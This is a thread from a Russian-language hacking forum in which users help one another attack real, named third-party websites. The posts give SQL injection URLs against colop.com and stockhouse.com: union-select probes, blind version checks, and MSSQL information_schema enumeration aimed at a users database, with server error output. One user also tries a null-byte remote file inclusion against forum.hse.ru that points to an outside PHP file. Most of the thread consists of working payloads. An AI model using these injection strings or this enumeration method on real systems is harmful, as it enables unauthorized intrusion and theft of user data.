Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    http://previous.colop.com/sl/products/colop--printer_dater/product.php?id=-colop:11322000'+union+select+1,2,3,4,5,6,7,8,9,10,11,12+--+


    Здесь есть SQL-inj?
     
  2. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    слепая есть =>
    http://previous.colop.com/sl/products/colop--printer_oval/product.php?id=colop:13026000'+and+(select substring(version(),1,1))=4/*
    если пытаться вывести и первый запрос возращ. фелсе, то ошибка в XML. мб Xpath и SQLinj хз
     
    #13142 Strilo4ka, 23 May 2010
    Last edited: 23 May 2010
  3. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    спс прошло, но тут как можно выводит инфо с соседных бд а не с текушего?

    http://www.stockhouse.com/adredirect.asp?sid=(select/**/top+1+table_name+from+information_schema.tables)--
    выводит таблицу с текушего бд Shdb
     
  4. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    +where+table_schema=
     
    _________________________
  5. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    если бы where помогло не писал бы тут((

    вот
    http://www.stockhouse.com/adredirect.asp?sid=(select/**/top+1+table_name+from+information_schema.tables+where+table_schema='SH_users')--

    ADODB.Field error '800a0bcd'

    Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.

    /adredirect.asp, line 25
     
  6. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    HTML:
    group_concat(table_name)+from+infor  mation_schema.tables+where+table_schema!='informat  ion_schema'
    HTML:
    group_concat(table_name)+from+infor  mation_schema.tables+where+table_schema!='informat  ion_schema'+and+table_name>'здесь имя последней таблицы, которая вывелась в первом запросе'
    Либо
    HTML:
    group_concat(table_name)+from+infor  mation_schema.tables+limit+0,1
    и поочередно меняешь limit 0,1 limit 1,1 limit 2,1 и тд.
     
    #13146 h00lyshit!, 23 May 2010
    Last edited: 23 May 2010
  7. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    хмм. вроде ругается
    Microsoft OLE DB Provider for SQL Server error '80040e14' 'group_concat' is not a recognized built-in function name.
    /adredirect.asp, line 23

    я уже знаю имена всех бд, но нужные бд не текуший :confused:
     
  8. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    +where+table_schema+not+in+('information_schema')


    а так?
     
    _________________________
  9. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    А, ну так это MSSQL, ясное дело будет ругаться на group_concat :)
     
    #13149 h00lyshit!, 23 May 2010
    Last edited: 23 May 2010
  10. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    спс, как я понял тут нельзя выводит инфо именно с определеной бд(SH_users)
     
    1 person likes this.
  11. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886

    ну не будь ленивым,иди дальше и будет твой бд ;)
     
    _________________________
  12. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    упс , вернее так:
    http://www.stockhouse.com/adredirect.asp?sid=%28select/**/top+1+table_name+from+information_schema.tables%20where+table_name+not+in+%28%27MSmerge_tsvw_8BA2514492E34962820230F0E51BEE26%27%29%29--

    далее
    http://www.stockhouse.com/adredirect.asp?sid=%28select/**/top+1+table_name+from+information_schema.tables%20where+table_name+not+in+%28%27MSmerge_tsvw_8BA2514492E34962820230F0E51BEE26%27,%27MSmerge_log_files%27%29%29--

    и т.д

    В mssql есть база данных в которой хранится информация о всех таблицах и колонках во всех бд данного сервера

    статьи читать надо.
     
    #13152 Strilo4ka, 23 May 2010
    Last edited: 23 May 2010
    1 person likes this.
  13. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    ну статьи то читаю просто этот фильтр меня немного перепутал
     
  14. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    тут какая то неполадка. Я регал мейл kvadimex но не могу найти в базе этот мейл((. Подскажите как делать запрос тут. like '%email%' прошло в поиске таблицы с мейлом но like '%kvadimex%' не работает
     
  15. PunkAss

    PunkAss New Member

    Joined:
    19 Jan 2008
    Messages:
    9
    Likes Received:
    1
    Reputations:
    5
    Можно что-то придумать для такого запроса? :rolleyes: $table никак не фильтруется.

    Code:
    $sql = "REPAIR TABLE {$table}";
     
  16. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    не могу никак заинклудить (мож его тут и нет...хз)
    пробовал и с нулевым байтом и с ? и с расширением и без него...хз в чем дело
    http://forum.hse.ru/gold/index.php?t=usrinfo&id=http://site.ru/99.php%00

    если тут нет инклуда, то мб что то другое?
     
  17. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    инклуд в параметре id? nea :)
     
    _________________________
    1 person likes this.
  18. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://forum.hse.ru/gold/index.php?t=usrinfo&id=1
    и? Еще не надоело писать то, что и без вашего участия уже с такой же ошибкой (читай - кривые руки админа)?

    PS: Для начала найдите сайт, которые сразу, без вас, не вываливает мильон ошибок по какой-то ссылке
     
    #13158 Pashkela, 24 May 2010
    Last edited: 24 May 2010
    1 person likes this.
  19. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    Konqi,Pashkela

    то что и без меня есть ошибки я заметил=)
    мне интересно могу ли я влиять на бд каким либо образом?
     
  20. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    тебе нужно бд или инклуд?

    инклуд никак не связано с базой
     
    _________________________
Thread Status:
Not open for further replies.